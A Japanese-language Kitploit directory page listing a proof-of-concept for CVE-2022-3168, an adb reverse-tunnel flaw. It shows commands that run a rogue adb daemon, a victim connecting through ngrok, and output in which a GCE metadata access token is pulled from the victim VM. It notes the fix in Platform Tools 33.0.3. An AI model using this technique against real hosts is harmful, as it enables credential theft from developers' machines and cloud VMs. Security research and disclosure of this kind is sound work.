Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-3168-adb-unexpected-reverse-forwards — adbの脆弱性を悪用して、ホスト上で任意の宛先へのネットワーク接続を開くことを可能にした概念実証コード | Kitploit
ツール/GitHubGitHub/irsl/cve-2022-3168-adb-unexpected-reverse-forwards
Androidセキュリティ脆弱性分析エクスプロイトペネトレーションテストモバイルセキュリティレッドチーミング
GitHubirsl/cve-2022-3168-adb-unexpected-reverse-forwards

CVE-2022-3168-adb-unexpected-reverse-forwards

adbの脆弱性を悪用して、ホスト上で任意の宛先へのネットワーク接続を開くことを可能にした概念実証コード

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
31484年前未レビュー

Android Debug Bridge (adb) のリバーストンネル機能には、悪意のある adb デーモンがホスト上の任意のホスト/ポートおよび Unix ドメインソケットへの接続を開くことができる脆弱性がありました。

攻撃者ウィンドウ (不正なデーモンが実行されている場所):

root@kitploit:~
$ ./adb_rogue_daemon.py

被害者ウィンドウ (この例では GCE VM):

root@kitploit:~
$ adb connect serverip:5556
connected to 8.tcp.ngrok.io:19076

攻撃者ウィンドウ:

root@kitploit:~
...
Wooho, we got response for our rouge request!
b'HTTP/1.0 200 OK\r\nMetadata-Flavor: Google\r\nContent-Type: application/json\r\nDate: Thu, 04 Nov 2021 22:31:21 GMT\r\nServer: Metadata Server for VM\r\nConnection: Close\r\nContent-Length: 1049\r\nX-XSS-Protection: 0\r\nX-Frame-Options: SAMEORIGIN\r\n\r\n{"access_token":"ya29.c.KpgBFghLV[redacted].....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................'
<<< b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
('....', (774778414, 774778414, 774778414, 774778414, 774778414), b'...........................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba')

これは Platform Tools 33.0.3 で修正されました。

ツールをダウンロード